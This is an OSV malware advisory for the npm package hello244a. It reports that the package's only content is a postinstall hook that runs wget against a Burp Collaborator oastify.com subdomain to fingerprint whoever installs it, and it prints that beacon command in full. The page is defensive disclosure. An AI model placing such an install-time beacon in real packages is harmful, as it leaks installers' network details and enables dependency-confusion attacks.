hello244a @1.0.20
Vulnerability report · Last retrieved from osv.dev July 3, 2026 at 9:10 PM UTC
OSV ID
MAL-2026-5188
Ecosystem
npm
Summary
The package contains no library code, no main entry, and no documented functionality. Its only file is package.json, which declares a postinstall script: wget --quiet "http://whh5mwn8dlvrjgpe32tqrnu3eukl8kw9.oastify.com/" . On npm install , the lifecycle hook fires automatically and performs a plain-HTTP GET to a unique per-victim subdomain on oastify.com (Burp Suite Collaborator, an out-of-band interaction host). The DNS resolution and HTTP request disclose the installer's public IP, DNS resolver, hostname, and internal network position to whoever provisioned that Collaborator instance. The package has no purpose other than this beacon — it is the canonical dependency-confusion / typosquat-shell pattern used to fingerprint installers and prove exploitability of name-resolution weaknesses in private registries.
Source: amazon-inspector (02e5f7412a9593e0ec3d0d8c28082c01edff82746bd48966c6fb88a3b1f88866)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.